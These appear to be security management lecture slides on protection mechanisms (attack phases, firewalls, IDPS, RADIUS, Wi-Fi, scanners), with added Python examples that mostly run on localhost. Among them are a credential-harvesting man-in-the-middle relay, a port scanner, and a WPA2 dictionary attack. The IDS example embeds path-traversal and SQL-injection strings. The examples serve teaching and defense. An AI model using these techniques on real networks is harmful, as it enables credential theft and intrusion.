INFORMATION SECURITY MANAGEMENT CHAPTER 10: PROTECTION MECHANISMS You got to be careful if you don’t know where you’re going, because you might not get there. – Yogi Berra





Windows XP

Zero days turn to "forever days": once a product is out of support, newly found vulnerabilities are never patched

Principles of Information Security Management

Include the following characteristics that will be the focus of the current course (six P's):

1. Planning
2. Policy
3. Programs
4. Protection
5. People
6. Project Management


Planning

• Planning as part of InfoSec management
– An extension of the basic planning model discussed earlier in this chapter

• Included in the InfoSec planning model
– Activities necessary to support the design, creation, and implementation of information security strategies

Planning (cont’d.)

• Types of InfoSec plans
– Incident response planning
– Business continuity planning
– Disaster recovery planning
– Policy planning
– Personnel planning
– Technology rollout planning
– Risk management planning
– Security program planning
  • includes education, training, and awareness


Policy

• The set of organizational guidelines that dictates certain behavior within the organization

• Three general categories of policy:
– Enterprise information security policy (EISP)
– Issue-specific security policy (ISSP)
– System-specific policies (SysSPs)

UNCW Policies


Programs

• InfoSec operations that are specifically managed as separate entities
– Example: a security education, training, and awareness (SETA) program

• Other types of programs
– Physical security program
  • complete with fire, physical access, gates, guards, etc.


Protection

• Executed through risk management activities
– Includes:
  – Risk assessment and control
  – Protection mechanisms
  – Technologies
  – Tools

• Each of these mechanisms represents some aspect of the management of specific controls in the overall information security plan


People

• Managers must recognize the crucial role that people play in the information security program

• This area of InfoSec includes security personnel and the security of personnel, as well as aspects of a SETA program

• People are the most critical link in the information security program

Project Management

Identifying and controlling the resources applied to the project

Measuring progress

Adjusting the process as progress is made

Target Incident – Topic Paper Presentation

Software Demo – Mark Grover

Hacking Networks

Phase 1: Reconnaissance
Physical Break-In
Dumpster Diving
Google, Newsgroups, Web sites
Social Engineering
  Phishing: fake email that lures the victim into handing over credentials or running an attachment
  Pharming: redirecting the victim to a fake web page (e.g. by DNS or hosts-file poisoning) even when the correct address is typed
WhoIs Database
Domain Name Server


Example WHOIS record (MICROSOFT.COM, as captured on the slide):

Registrant: Microsoft Corporation, One Microsoft Way, Redmond, WA 98052 US

Domain name: MICROSOFT.COM

Administrative Contact: Administrator, Domain, [email protected], One Microsoft Way, Redmond, WA 98052 US, +1.4258828080
Technical Contact: Hostmaster, MSN, [email protected], One Microsoft Way, Redmond, WA 98052 US, +1.4258828080

Registration Service Provider: DBMS VeriSign, [email protected], 800-579-2848 x4. Please contact DBMS VeriSign for domain updates, DNS/Nameserver changes, and general domain support questions.

Registrar of Record: TUCOWS, INC.
Record last updated on 27-Aug-2006. Record expires on 03-May-2014. Record created on 02-May-1991.

Domain servers in listed order: NS3.MSFT.NET, NS1.MSFT.NET, NS4.MSFT.NET, NS2.MSFT.NET, NS5.MSFT.NET

(Every field here is reconnaissance material: names, phone numbers and e-mail addresses are targets for social engineering and phishing, and the name servers are the next systems to query.)

Hacking Networks

Phase 2: Scanning
War Driving: Can I find a wireless network?
War Dialing: Can I find a modem to connect to?
Network Mapping: What IP addresses exist, and what ports are open on them?
Vulnerability-Scanning Tools: What versions of software run on those devices, and which known vulnerabilities do those versions carry?

Passive Attacks

Eavesdropping: Listen to packets from other parties = Sniffing

Traffic Analysis: Learn about network from observing traffic patterns

Footprinting: Determine the hosts, addresses and services that make up the target = Network Mapping. Note that probing a target this way sends packets and is strictly an active step; only eavesdropping and traffic analysis are truly passive. Identifying the software versions behind the open ports is fingerprinting.

Hacking Networks: Phase 3: Gaining Access

Network Attacks:
– Sniffing (Eavesdropping)
– IP Address Spoofing
– Session Hijacking

System Attacks:
– Buffer Overflow
– Password Cracking
– SQL Injection
– Web Protocol Abuse
– Denial of Service
– Trap Door
– Virus, Worm, Trojan


Some Active Attacks

Denial of Service: Message did not make it; or service could not run

Masquerading or Spoofing: The actual sender is not the claimed sender

Message Modification: The message was modified in transmission

Packet Replay: A past packet is transmitted again in order to gain access or otherwise cause damage

Man-in-the-Middle Attack (figure)

The attacker sits between the client and the server and relays the exchange, reading (and if desired altering) every message:
(1) client sends Login to the attacker, believing it is the server
(2) attacker forwards Login to the real server
(3) client sends Password to the attacker
(4) attacker forwards Password to the server
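The relay the figure describes, as an added example that is not part of the slides: a Python plaintext login server, the attacker's relay and a victim client, all constructed here on 127.0.0.1. How the victim is steered to the attacker's address (ARP or DNS spoofing, a rogue access point) is outside the figure and is simply assumed. The point is that for any protocol that sends credentials in the clear, the relay reads them while the victim sees a perfectly normal, successful login.

```python
import socket
import threading


def _readline(sock):
    """Read one newline-terminated line (used by the constructed server)."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.strip()


def start_server(valid_users):
    """Constructed plaintext login server (stand-in for telnet/FTP-style protocols).
    Returns the port it listens on."""
    lst = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lst.bind(("127.0.0.1", 0))
    lst.listen(1)

    def serve():
        conn, _ = lst.accept()
        conn.sendall(b"login: ")
        user = _readline(conn)
        conn.sendall(b"password: ")
        password = _readline(conn)
        ok = valid_users.get(user.decode()) == password.decode()
        conn.sendall(b"OK\n" if ok else b"DENIED\n")
        conn.close()
        lst.close()

    threading.Thread(target=serve, daemon=True).start()
    return lst.getsockname()[1]


def _relay(src, dst, direction, log):
    """Copy bytes src -> dst, recording every chunk: the attacker sees it all."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            log.append((direction, data))
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def start_mitm(real_server, log):
    """Attacker's relay. The victim is redirected here (assumed: ARP/DNS spoofing or a rogue AP)
    and believes it is talking to the server. Returns the port the relay listens on."""
    lst = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lst.bind(("127.0.0.1", 0))
    lst.listen(1)

    def run():
        victim, _ = lst.accept()
        upstream = socket.create_connection(real_server)
        t1 = threading.Thread(target=_relay, args=(victim, upstream, "client->server", log))
        t2 = threading.Thread(target=_relay, args=(upstream, victim, "server->client", log))
        t1.start(); t2.start(); t1.join(); t2.join()
        victim.close(); upstream.close(); lst.close()

    threading.Thread(target=run, daemon=True).start()
    return lst.getsockname()[1]


def client_login(port, user, password):
    """Victim client: sends login and password in the clear, returns True on 'OK'."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(user.encode() + b"\n")
        s.sendall(password.encode() + b"\n")
        out = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            out += chunk
    return out.endswith(b"OK\n")


def harvest(log):
    """Attacker's post-processing: the first two client lines are login and password."""
    stream = b"".join(data for direction, data in log if direction == "client->server")
    login, password = stream.split(b"\n")[:2]
    return login.decode(), password.decode()


def demo():
    log = []
    real_port = start_server({"alice": "hunter2"})            # constructed credentials
    fake_port = start_mitm(("127.0.0.1", real_port), log)
    succeeded = client_login(fake_port, "alice", "hunter2")    # victim actually talks to the attacker
    return succeeded, harvest(log)
```

`demo()` returns `(True, ("alice", "hunter2"))`: the login succeeds from the victim's point of view and the attacker has the credentials. The fix is not a stronger password but server-authenticated encryption (TLS): a relay then either cannot read the stream or fails the client's certificate check. The same relay position also hands the attacker the live session, which is the session hijacking listed under Phase 3.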

Hacking Networks: Phase 4: Exploit/Maintain Access

Trojan Horse: A useful utility that actually creates a backdoor.
Backdoor: Control of the system: run system commands, log keystrokes, capture passwords.
User-Level Rootkit: Replaces system executables, e.g. login, ls, du, so that they hide the attacker's files and processes.
Kernel-Level Rootkit: Replaces parts of the OS kernel, e.g. process or file control, to hide from every user-level tool.
Bot: Slave that forwards/performs commands; spreads, lists email addresses, launches DoS attacks.
Spyware: Collects info: keystroke logger, collects credit card numbers. AdWare: inserts ads, filters search results.



Bots and Botnets

Bots: Host illegal movies, music, pornography, criminal web sites, … Forward spam for financial gain

Botnets (figure): a herd of bots spread across many countries, e.g. China, Hungary, Russia, Bulgaria, United States, all controlled by one attacker

Distributed Denial of Service
Can barrage a victim server with requests, causing the network to fail to respond to anyone



• Threats -> Vulnerabilities -> Risk -> Controls

• Technical controls
– Must be combined with sound policy and education, training, and awareness efforts

• Examples of technical security mechanisms

Sphere of Protection

Source: Course Technology/Cengage Learning

Access Controls

• The four processes of access control
– Identification
– Authentication
– Authorization
– Accountability

• A successful access control approach always incorporates all four of these elements
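The four processes side by side, as an added example that is not the textbook's code: a small Python reference monitor with a constructed user store, group list and ACL. Identification is the name the caller supplies, authentication checks it against a PBKDF2 password hash (with a dummy record so an unknown name costs the same time as a known one), authorization consults the ACL by group, and every decision is written to an audit log, which is what accountability means in practice.

```python
import hashlib
import hmac
import os
import time

# Constructed directory: identities, salted password hashes, group membership, and an ACL.
USERS = {}                                  # user name -> (salt, pbkdf2 hash)
GROUPS = {"alice": {"hr"}, "bob": {"eng"}}  # who belongs to which role
ACL = {                                     # resource -> action -> groups allowed
    "/payroll": {"read": {"hr"}, "write": {"hr"}},
    "/wiki": {"read": {"hr", "eng"}, "write": {"eng"}},
}
AUDIT = []                                  # accountability: append-only decision log
_DUMMY = (b"\0" * 16, b"\0" * 32)           # used for unknown users so timing does not reveal them


def _audit(event, **fields):
    AUDIT.append({"ts": time.time(), "event": event, **fields})


def _hash(password, salt, rounds=100_000):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)


def enroll(user, password):
    """Identification is only meaningful if the identity was provisioned first."""
    salt = os.urandom(16)
    USERS[user] = (salt, _hash(password, salt))


def authenticate(user, password):
    """Prove the claimed identity: same work and a constant-time compare whether or not the user exists."""
    salt, stored = USERS.get(user, _DUMMY)
    ok = hmac.compare_digest(_hash(password, salt), stored) and user in USERS
    _audit("authenticate", user=user, result=ok)
    return ok


def authorize(user, resource, action):
    """Decide what an authenticated identity may do, by group membership against the ACL."""
    allowed = bool(GROUPS.get(user, set()) & ACL.get(resource, {}).get(action, set()))
    _audit("authorize", user=user, resource=resource, action=action, result=allowed)
    return allowed


def access(user, password, resource, action):
    """All four processes in order: identification (the supplied name), authentication,
    authorization, and accountability (each step above appended to AUDIT)."""
    if not authenticate(user, password):
        return "authentication failed"
    if not authorize(user, resource, action):
        return "forbidden"
    return "granted"
```

Note the order: authorization is never consulted for a caller who failed authentication, and the audit entries are written even for failures, since the failed attempts are the ones an investigator will want.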

Table 10-1 Password power

Source: Course Technology/Cengage Learning

Access Controls – Password Strength

Acceptability of Biometrics

• Note: Iris scanning has grown rapidly in popularity due to its acceptability, low cost, and effective security


Firewalls

• Any device that prevents a specific type of information from moving between two networks

Types:
• Packet Filtering
• Application Level
• Stateful Inspection Firewalls

Packet filtering firewalls

Simple networking devices that filter packets by examining every incoming and outgoing packet header

Application-level firewalls

– Consists of dedicated computers kept separate from the first filtering router (edge router)

– Commonly used in conjunction with a second or internal filtering router - or proxy server

– Implemented for specific protocols

Stateful inspection firewalls

– Keeps track of each network connection established between internal and external systems using a state table

– Can restrict incoming packets by allowing access only to packets that constitute responses to requests from internal hosts
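An added example, not from the textbook, contrasting the two filter types: a Python simulation over constructed packet headers. The internal network 10.0.0.0/24 and the outside addresses (RFC 5737 documentation ranges) are assumptions. The stateless filter has to admit any packet from source port 80 to a high port in order to let web replies in, so a crafted inbound packet with source port 80 walks through it; the stateful filter admits inbound packets only when its state table shows an inside host asked for them.

```python
from collections import namedtuple

# Constructed packets: only the header fields a filter looks at.
Packet = namedtuple("Packet", "src sport dst dport syn ack")
INTERNAL_PREFIX = "10.0.0."                 # assumed internal network (RFC 1918)


def is_internal(ip):
    return ip.startswith(INTERNAL_PREFIX)


def stateless_filter(pkt):
    """Packet filtering router: one decision per packet, from its header alone.
    To let web replies back in it must admit *any* packet from source port 80 to a high port."""
    if is_internal(pkt.src) and pkt.dport == 80:
        return "allow"                      # outbound HTTP request
    if not is_internal(pkt.src) and pkt.sport == 80 and pkt.dport > 1023:
        return "allow"                      # meant for replies, but matches crafted packets too
    return "deny"


class StatefulFirewall:
    """Stateful inspection: remembers connections initiated from inside in a state table and admits
    inbound packets only if they belong to one of them."""

    def __init__(self):
        self.state = set()                  # (src, sport, dst, dport) of internal-initiated flows

    def filter(self, pkt):
        forward = (pkt.src, pkt.sport, pkt.dst, pkt.dport)
        reverse = (pkt.dst, pkt.dport, pkt.src, pkt.sport)
        if is_internal(pkt.src) and pkt.dport == 80:
            if pkt.syn and not pkt.ack:
                self.state.add(forward)     # new outbound connection: record it
            return "allow" if forward in self.state else "deny"
        if reverse in self.state:
            return "allow"                  # reply to something an inside host asked for
        return "deny"                       # unsolicited inbound, whatever its source port


def run_scenarios():
    """Returns {scenario: (stateless verdict, stateful verdict)} for three constructed packets."""
    fw = StatefulFirewall()
    request = Packet("10.0.0.5", 40000, "198.51.100.20", 80, syn=True, ack=False)
    reply = Packet("198.51.100.20", 80, "10.0.0.5", 40000, syn=True, ack=True)
    crafted = Packet("203.0.113.9", 80, "10.0.0.5", 3389, syn=True, ack=False)  # attacker sets sport=80
    results = {}
    for name, pkt in [("outbound request", request), ("legitimate reply", reply), ("crafted inbound", crafted)]:
        results[name] = (stateless_filter(pkt), fw.filter(pkt))
    return results
```

Real stateful firewalls also age entries out of the table and track TCP flags more carefully; the one-line difference that matters is that the inbound decision consults the table rather than the source port.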

Firewall Architectures

• Each firewall generation can be implemented in several architectural configurations

• Common architectural implementations
– Packet filtering routers
– Screened-host firewalls
– Dual-homed host firewalls
– Screened-subnet firewalls

Firewall Architectures: Packet filtering routers

• Most organizations with an Internet connection use some form of router between their internal networks and the external service provider

Firewall Architectures:Screened-host firewall systems

• Combine the packet filtering router with a separate, dedicated firewall such as an application proxy server

Firewall Architectures:Dual-Homed host firewalls

• The bastion host contains two network interfaces
1. One is connected to the external network
2. One is connected to the internal network

Selecting the Right Firewall

• Firewall Technology
• Cost
• Maintenance
• Future Growth

Managing Firewalls

• Any firewall device must have its own configuration
• Firewall Rules
• Policy regarding firewall use

• Firewall best practices
– All traffic from the trusted network allowed out (the textbook default; in practice outbound traffic should be filtered too, so that a compromised internal host cannot freely reach command-and-control servers or exfiltrate data)
– The firewall is never accessible directly from the public network
– Email Policies

Intrusion Detection and Prevention Systems (IDPS)

• The term intrusion detection/prevention system (IDPS) can be used to describe current anti-intrusion technologies

• Like firewall systems, IDPSs require complex configurations to provide the level of detection and response desired

Intrusion Detection and Prevention Systems (cont’d.)

IDPS technologies can respond to a detected threat by attempting to prevent it from succeeding

Network or Host Based Protection

IDPS – Host vs. Network

Signature-Based IDPS

• Examines data traffic for something that matches the preconfigured, predetermined attack pattern signatures

• Weakness: slow and methodical attacks may slip undetected through the IDPS, as their actions may not match a signature that includes factors based on duration of the events

Statistical Anomaly-Based IDPS

• First collects data from normal traffic and establishes a baseline
– Then periodically samples network activity, based on statistical methods, and compares the samples to the baseline

• Advantage: Able to detect new types of attacks, because it looks for abnormal activity of any type
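An added example (not the textbook's code) that runs both detection styles over constructed web-server log lines: a slow path-traversal probe that only the signatures catch, and a fast burst carrying a payload no signature knows that only the anomaly detector catches. The log format, addresses and rates are all constructed.

```python
import re
import statistics
from collections import Counter

# Signature-based detection: fixed patterns of known attacks.
SIGNATURES = {
    "path-traversal": re.compile(r"\.\./"),
    "sqli-union": re.compile(r"union\s+select", re.I),
}


def signature_detect(lines):
    """Flag every line matching a known attack signature."""
    return [(name, line) for line in lines for name, rx in SIGNATURES.items() if rx.search(line)]


def requests_per_minute(lines):
    """Count requests per (source IP, minute) from constructed lines shaped like
    '10.1.2.3 [10:07:15] "GET /index.html HTTP/1.1" 200'."""
    counts = Counter()
    for line in lines:
        ip, stamp = line.split(" ", 2)[:2]
        counts[(ip, stamp[1:6])] += 1         # "[10:07:15]" -> "10:07"
    return counts


def build_baseline(training_lines):
    """Anomaly detection step 1: learn what normal looks like (mean and spread of per-minute rates)."""
    rates = list(requests_per_minute(training_lines).values())
    return statistics.mean(rates), statistics.pstdev(rates)


def anomaly_detect(lines, baseline, k=3.0):
    """Anomaly detection step 2: flag any (source, minute) whose rate exceeds mean + k*stddev."""
    mean, sd = baseline
    return [(ip, minute, n) for (ip, minute), n in requests_per_minute(lines).items() if n > mean + k * sd]


def make_lines(ip, minute, n, path="/index.html"):
    """Constructed log lines for source ip during minute 10:MM."""
    return [f'{ip} [10:{minute:02d}:{(i * 7) % 60:02d}] "GET {path} HTTP/1.1" 200' for i in range(n)]


def demo():
    # Training window: three ordinary clients, 2-4 requests a minute for ten minutes.
    training = []
    for minute in range(10):
        for j, ip in enumerate(["10.1.0.11", "10.1.0.12", "10.1.0.13"]):
            training += make_lines(ip, minute, 2 + (minute + j) % 3)
    baseline = build_baseline(training)

    # Monitoring window: the same clients, plus two attackers.
    window = []
    for minute in range(20, 25):
        for ip in ["10.1.0.11", "10.1.0.12", "10.1.0.13"]:
            window += make_lines(ip, minute, 3)
    # Attacker A: fast, with a payload no signature covers -> only the anomaly detector sees it.
    window += make_lines("203.0.113.7", 22, 40, "/search?q=%27%20or%201%3D1--")
    # Attacker B: one probe per minute with a textbook payload -> only the signature matches.
    for minute in range(20, 25):
        window += make_lines("198.51.100.9", minute, 1, "/../../etc/passwd")

    return {
        "baseline": baseline,
        "signature": signature_detect(window),
        "anomaly": anomaly_detect(window, baseline),
    }
```

The two lists `demo()` returns do not overlap, which is the argument for running both: signatures miss what they have never seen, and rate-based anomaly detection misses anything patient. The baseline is also only as good as the training window; an attacker who is already active while it is collected becomes part of "normal".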

Managing IDPS

• IDPSs must be configured to differentiate between routine circumstances and low, moderate, or severe threats

• A properly configured IDPS can translate a security alert into different types of notifications

• Most IDPSs monitor systems using agents

• Consolidated enterprise manager

Honeypot & Honeynet

Honeypot: A system with a special software application which appears easy to break into

Honeynet: A network which appears easy to break into
Purpose: Catch attackers
All traffic going to a honeypot/honeynet is suspicious
If successfully penetrated, the honeypot can be used to launch further attacks
Must be carefully monitored

(figure: network diagram showing External DNS, IDS, Web Server, E-Commerce server and VPN Server)



Remote Access Protection

• Network connectivity using external connections
– Usually much simpler and less sophisticated than Internet connections
– Simple user name and password schemes are usually the only means of authentication

Dial-Up Protection

• Systems that authenticate the credentials of dial-up access users

• Typical dial-up systems place the authentication of users on the system connected to the modems

• Options:
• Remote Authentication Dial-In User Service (RADIUS)
• Terminal Access Controller Access Control System (TACACS)


Authentication Protocols

RADIUS: Over-the-wire protocol from the client (the network access server) to the AAA (authentication, authorization, accounting) server


Source: Course Technology/Cengage Learning
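The over-the-wire exchange, as an added example that is not the textbook's: a Python Access-Request / Access-Accept round trip following RFC 2865, with the User-Password hiding (the MD5 XOR chain) and the Response Authenticator the network access server uses to check that the reply came from a server holding the shared secret. User names, passwords and secrets are constructed; there is no network I/O, the two sides simply hand each other the byte strings that would go on the wire.

```python
import hashlib
import hmac
import os
import struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT = 1, 2, 3   # RFC 2865 packet codes
USER_NAME, USER_PASSWORD = 1, 2                           # attribute types
HEADER = struct.Struct("!BBH")                            # code, identifier, length (16-byte authenticator follows)


def attribute(atype, value):
    return bytes([atype, 2 + len(value)]) + value


def parse_attributes(data):
    attrs, i = {}, 0
    while i < len(data):
        atype, length = data[i], data[i + 1]
        attrs[atype] = data[i + 2:i + length]
        i += length
    return attrs


def hide_password(password, secret, request_auth):
    """RFC 2865 s5.2: pad to 16-byte blocks; each block is XORed with MD5(secret || previous
    ciphertext block), the first block with MD5(secret || Request Authenticator)."""
    padded = password + b"\0" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        mask = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ m for p, m in zip(padded[i:i + 16], mask))
        out += block
        prev = block
    return out


def reveal_password(data, secret, request_auth):
    out, prev = b"", request_auth
    for i in range(0, len(data), 16):
        mask = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ m for c, m in zip(data[i:i + 16], mask))
        prev = data[i:i + 16]
    return out.rstrip(b"\0")


def build_packet(code, ident, authenticator, attrs):
    body = b"".join(attrs)
    return HEADER.pack(code, ident, 20 + len(body)) + authenticator + body


def response_authenticator(code, ident, request_auth, attrs_bytes, secret):
    """MD5(Code || ID || Length || RequestAuth || Attributes || Secret): the client's only proof
    that the reply came from a server that knows the shared secret."""
    length = 20 + len(attrs_bytes)
    return hashlib.md5(HEADER.pack(code, ident, length) + request_auth + attrs_bytes + secret).digest()


def client_access_request(ident, user, password, secret):
    """NAS side: fresh random Request Authenticator, User-Name and hidden User-Password."""
    request_auth = os.urandom(16)
    attrs = [attribute(USER_NAME, user), attribute(USER_PASSWORD, hide_password(password, secret, request_auth))]
    return build_packet(ACCESS_REQUEST, ident, request_auth, attrs), request_auth


def server_handle(packet, secret, users):
    """AAA server side: recover the password, check it, answer Accept or Reject."""
    code, ident, length = HEADER.unpack(packet[:4])
    request_auth = packet[4:20]
    attrs = parse_attributes(packet[20:length])
    password = reveal_password(attrs.get(USER_PASSWORD, b""), secret, request_auth)
    ok = code == ACCESS_REQUEST and users.get(attrs.get(USER_NAME)) == password
    resp = ACCESS_ACCEPT if ok else ACCESS_REJECT
    return build_packet(resp, ident, response_authenticator(resp, ident, request_auth, b"", secret), [])


def client_verify(response, ident, request_auth, secret):
    """NAS side: accept the reply only if the identifier matches and the Response Authenticator checks out."""
    code, rid, length = HEADER.unpack(response[:4])
    expected = response_authenticator(code, rid, request_auth, response[20:length], secret)
    genuine = rid == ident and hmac.compare_digest(response[4:20], expected)
    return genuine, code


def exchange(user, password, secret_nas, secret_server, users, ident=42):
    """One round trip. Separate secrets for the two sides let a forged or misconfigured server be shown."""
    request, request_auth = client_access_request(ident, user, password, secret_nas)
    response = server_handle(request, secret_server, users)
    return client_verify(response, ident, request_auth, secret_nas)
```

`exchange()` returns `(True, 2)` for a good login, `(True, 3)` for a bad password, and `(False, 3)` when the server does not hold the right secret. The Response Authenticator is the only integrity check on a bare Access-Accept and it is built on MD5, which is why RFC 3579's Message-Authenticator attribute and carrying RADIUS over TLS or IPsec are now expected. The shared secret must also be long and random: anyone who captures one exchange has every input to `response_authenticator` except the secret and can brute-force it offline.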

Managing Connections

• Organizations that continue to offer remote access must:
– Determine how many connections the organization has
– Control access to authorized modem numbers
– Use call-back whenever possible
– Use token-based authentication if at all possible

Wi-Fi security

• SSID should be a non-default value
• SSID broadcast should be disabled (note: this hides the network only from casual clients; any wireless sniffer still sees the SSID in probe and association frames)
• MAC access control (note: MAC addresses are trivially spoofed, so this is a speed bump, not authentication)
• Authentication
  • Require ID and password, may use a RADIUS server (IEEE 802.1X)

Encryption
• WEP (Wired Equivalent Privacy): broken; keys are recoverable from captured traffic
• WPA (Wi-Fi Protected Access): interim fix (TKIP) for WEP-era hardware
• WPA2 (full IEEE 802.11i standard; AES-CCMP)

Managing Wireless Connections

• Regulate the wireless network footprint

• Select WPA2 (WPA only where WPA2 is unavailable) and never WEP, which is broken

• Protect preshared keys
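An added example (not from the slides) of why "protect preshared keys" matters: the WPA2-Personal PMK derivation, which is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, and the offline dictionary attack an attacker runs after capturing a single 4-way handshake. The SSID, passphrases and wordlist below are constructed. The only secret input is the passphrase, so once a handshake has been captured the access point is no longer needed and rate limiting cannot help.

```python
import hashlib
import hmac


def wpa2_pmk(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
    Everything here except the passphrase is public, so the PMK is only as strong as the passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def offline_dictionary_attack(target_pmk, ssid, wordlist):
    """What an attacker does with a captured 4-way handshake: derive a PMK per candidate and compare.
    (In practice the comparison is against the handshake's MIC, which is computed from the PMK;
    comparing PMKs directly keeps this example short.)"""
    for candidate in wordlist:
        if hmac.compare_digest(wpa2_pmk(candidate, ssid), target_pmk):
            return candidate
    return None


def demo():
    ssid = "CorpWiFi"                                        # constructed network
    wordlist = ["password", "letmein", "CorpWiFi1", "Summer2014!", "correct horse battery staple"]
    weak = wpa2_pmk("Summer2014!", ssid)                     # a PSK of the kind found in wordlists
    strong = wpa2_pmk("q7#Lm9!vR2$kW8pZ&nT4", ssid)          # not in any wordlist
    return offline_dictionary_attack(weak, ssid, wordlist), offline_dictionary_attack(strong, ssid, wordlist)
```

`demo()` returns `("Summer2014!", None)`. Because the SSID is the salt, precomputed tables only work per SSID, which is the real reason behind the "non-default SSID" advice above; it does nothing against a direct dictionary attack on a weak passphrase. For a self-check, the published IEEE 802.11i test vector is passphrase `password`, SSID `IEEE`, PMK `f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e`.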

Scanning and Analysis Tools

• Used to find vulnerabilities in systems

• Security administrators may use attacker’s tools to examine their own defenses and search out areas of vulnerability

• Scanning tools
• Footprinting
• Fingerprinting

Pen Testing Article

“What is Penetration Testing?”

Port Scanners

• Port scanning utilities (port scanners)
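An added example, not from the textbook, that serves both Phase 2 (network mapping: which ports answer) and this slide (port scanning and fingerprinting): a Python TCP connect scanner with banner grabbing, run against two constructed "daemons" on 127.0.0.1 and one closed port. Real targets, ports and banners would of course differ.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def grab_banner(sock, nbytes=128, timeout=1.0):
    """Fingerprinting: many services announce themselves right after connect."""
    sock.settimeout(timeout)
    try:
        return sock.recv(nbytes).decode("ascii", "replace").strip()
    except (socket.timeout, OSError):
        return ""


def scan_port(host, port, timeout=1.0):
    """TCP connect scan of a single port: open / closed (RST) / filtered (no answer)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except ConnectionRefusedError:
            return port, "closed", ""
        except (socket.timeout, OSError):
            return port, "filtered", ""
        return port, "open", grab_banner(s)


def scan(host, ports, workers=64):
    """Network mapping of one host: scan the ports in parallel, results sorted by port number."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return sorted(pool.map(lambda p: scan_port(host, p), ports))


def fingerprint(banner):
    """Crude service identification from the banner text."""
    b = banner.upper()
    if b.startswith("SSH-"):
        return "ssh"
    if b.startswith("HTTP/"):
        return "http"
    if b.startswith("220 ") and "FTP" in b:
        return "ftp"
    if b.startswith("220 "):
        return "smtp"
    return "unknown"


def _lab_service(banner):
    """Constructed stand-in for a real daemon: accepts one connection on 127.0.0.1 and sends a banner."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    srv.settimeout(10)

    def serve():
        try:
            conn, _ = srv.accept()
            conn.sendall(banner)
            conn.close()
        except OSError:
            pass
        finally:
            srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def _free_port():
    """A port nothing listens on, so the scan sees a 'closed' result."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Scan a constructed host: a fake SSH daemon, a fake SMTP daemon and a closed port."""
    ssh = _lab_service(b"SSH-2.0-OpenSSH_7.4\r\n")
    smtp = _lab_service(b"220 mail.example.test ESMTP Postfix\r\n")
    closed = _free_port()
    report = {port: (state, fingerprint(banner), banner)
              for port, state, banner in scan("127.0.0.1", [ssh, smtp, closed])}
    return {"ssh": report[ssh], "smtp": report[smtp], "closed": report[closed]}
```

A connect scan completes the three-way handshake and is therefore logged by the target; a SYN scan (nmap's default) needs raw sockets to avoid that. The version string in the banner is what a vulnerability scanner then looks up. Scan only hosts you are authorized to test.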

Vulnerability Scanners

• Capable of scanning networks for very detailed information

• Identify exposed user names and groups, show open network shares, and expose configuration problems and other server vulnerabilities

Packet Sniffers

• A network tool that collects and analyzes packets on a network

• Connects directly to a local network from an internal location

Content Filters

• A software program or a hardware/software appliance that allows administrators to restrict content that comes into a network

• Common application of a content filter
– Restriction of access to Web sites with non-business-related material, such as pornography, or restriction of spam e-mail

Examples of Content Filters

Trap and Trace

• Trap
– Describes software designed to entice individuals who are illegally perusing the internal areas of a network

• Trace
– A process by which the organization attempts to determine the identity of someone discovered in unauthorized areas of the network or systems

Managing Scanning and Analysis Tools

• The security manager must be able to see the organization's systems and networks from the viewpoint of potential attackers

• Drawbacks:
– Tools do not have human-level capabilities
– Most tools function by pattern recognition, so they only handle known issues
– Some governments, agencies, institutions, and universities have established policies or laws that protect the individual user's right to access content
– Tool usage and configuration must comply with an explicitly articulated policy, and the policy must provide for valid exceptions


Cryptography

• Encryption
– The process of converting an original message into a form that cannot be understood by unauthorized individuals

• Cryptology
– The science of encryption
– Composed of two disciplines: cryptography (designing ciphers) and cryptanalysis (breaking them)

Cryptography (cont'd.)

• Algorithm: the public procedure for encrypting and decrypting
• Key: the secret input that selects one transformation out of all the algorithm can perform
• Keyspace: the set of all possible keys; its size bounds the work of a brute-force attack
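An added example (not from the textbook) tying algorithm, key and keyspace together, and covering the "password power" arithmetic of Table 10-1 above: a toy stream cipher whose algorithm is public, an exhaustive search over a deliberately tiny 16-bit keyspace that recovers the key in a fraction of a second, and the same arithmetic applied to a 128-bit key and to passwords of a given length and alphabet. The key, plaintext and guess rates are constructed; the cipher is for illustration only.

```python
import hashlib
import itertools


def keystream(key, n):
    """Toy stream cipher keystream: SHA-256(key || counter), concatenated until n bytes.
    The algorithm is public (Kerckhoffs's principle); only the key is secret. Not for real use."""
    out = b""
    for counter in itertools.count():
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        if len(out) >= n:
            return out[:n]


def encrypt(key, data):
    """XOR with the keystream; decryption is the same operation."""
    return bytes(p ^ k for p, k in zip(data, keystream(key, len(data))))


decrypt = encrypt


def brute_force(ciphertext, key_bits, crib):
    """Exhaust a keyspace of 2**key_bits keys; a known-plaintext crib recognises the right one."""
    nbytes = (key_bits + 7) // 8
    for k in range(1 << key_bits):
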